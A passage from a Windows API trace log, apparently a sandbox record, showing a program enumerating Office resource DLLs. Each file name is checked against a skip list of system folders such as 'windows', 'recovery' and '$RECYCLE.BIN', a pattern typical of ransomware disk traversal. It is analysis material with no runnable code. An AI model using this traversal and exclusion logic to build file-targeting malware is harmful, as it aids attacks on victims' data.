lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ef08 [0126.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0126.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.733] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x618c1b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x618c1b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x618c1b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fe030, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0126.733] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2=".") returned 1 [0126.733] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="..") returned 1 [0126.733] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="...") returned 1 [0126.733] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="windows") returned -1 [0126.733] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="recovery") returned -1 [0126.733] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="perflogs") returned -1 [0126.733] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.733] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.733] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="system volume information") returned -1 [0126.733] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="msocache") returned -1 [0126.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0126.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20dde8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0126.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0126.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20dba8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0126.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244be8 [0126.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0126.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.734] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf37f804b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf37f804b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf3b3f424, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3038, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0126.734] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2=".") returned 1 [0126.734] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="..") returned 1 [0126.734] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="...") returned 1 [0126.734] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="windows") returned -1 [0126.734] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="recovery") returned -1 [0126.734] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="perflogs") returned -1 [0126.734] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="documents and settings") returned 1 [0126.734] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.734] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="system volume information") returned -1 [0126.734] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="msocache") returned -1 [0126.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0126.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22ce70, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0126.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0126.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0126.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e9d0 [0126.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244be8 | out: hHeap=0x1e0000) returned 1 [0126.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.734] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9e7d566, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9e7d566, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9ea37c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1ca90, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MI93CC~1.DLL")) returned 1 [0126.734] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2=".") returned 1 [0126.735] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="..") returned 1 [0126.735] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="...") returned 1 [0126.735] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="windows") returned -1 [0126.735] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="recovery") returned -1 [0126.735] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="perflogs") returned -1 [0126.735] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="documents and settings") returned 1 [0126.735] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.735] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="system volume information") returned -1 [0126.735] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="msocache") returned -1 [0126.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dba8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0126.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dde8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0126.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ede0 [0126.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0126.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.735] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6c6bda4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6c6bda4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c6bda4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MIE9BA~1.DLL")) returned 1 [0126.735] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2=".") returned 1 [0126.735] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="..") returned 1 [0126.735] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="...") returned 1 [0126.735] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="windows") returned -1 [0126.735] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="recovery") returned -1 [0126.735] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="perflogs") returned -1 [0126.735] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="documents and settings") returned 1 [0126.735] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.735] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="system volume information") returned -1 [0126.735] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="msocache") returned -1 [0126.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0126.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dde8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0126.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0126.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20d728, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0126.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e688 [0126.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0126.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.736] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5a8a2df, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5a8a2df, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a8a2df, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4c050, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0126.736] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2=".") returned 1 [0126.736] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="..") returned 1 [0126.736] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="...") returned 1 [0126.736] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="windows") returned -1 [0126.736] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="recovery") returned -1 [0126.736] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="perflogs") returned -1 [0126.736] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="documents and settings") returned 1 [0126.736] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.736] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="system volume information") returned -1 [0126.736] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="msocache") returned -1 [0126.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0126.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0126.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0126.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0126.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247e68 [0126.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0126.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.737] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfaebb622, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaebb622, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfaebb622, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x47068, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MIB24E~1.DLL")) returned 1 [0126.737] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2=".") returned 1 [0126.737] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="..") returned 1 [0126.737] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="...") returned 1 [0126.737] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="windows") returned -1 [0126.737] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="recovery") returned -1 [0126.737] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="perflogs") returned -1 [0126.737] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="documents and settings") returned 1 [0126.737] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.737] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="system volume information") returned -1 [0126.737] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="msocache") returned -1 [0126.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dde8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20d578, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e228 [0126.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0126.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.737] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb67b102, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb67b102, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb6c7584, 